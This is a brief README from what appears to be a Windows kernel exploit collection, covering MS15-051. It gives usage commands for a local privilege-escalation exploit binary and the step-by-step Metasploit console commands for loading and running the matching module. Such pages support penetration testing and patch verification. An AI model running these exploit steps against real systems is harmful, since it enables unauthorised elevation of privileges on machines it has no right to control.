Back to Windows Kernel Exploits

MS15-051

MS15-051/README.md

latest968 B
Original Source

MS15-051

Vulnerability reference:

Usage

c:\> MS15-051.exe whoami


load the module within the Metasploit console

 msf > use exploit/windows/local/ms15_051_client_copy_image
      msf exploit(ms15_051_client_copy_image) > show targets
            ...targets...
      msf exploit(ms15_051_client_copy_image) > set TARGET <target-id>
      msf exploit(ms15_051_client_copy_image) > show options
            ...show and set options...
      msf exploit(ms15_051_client_copy_image) > exploit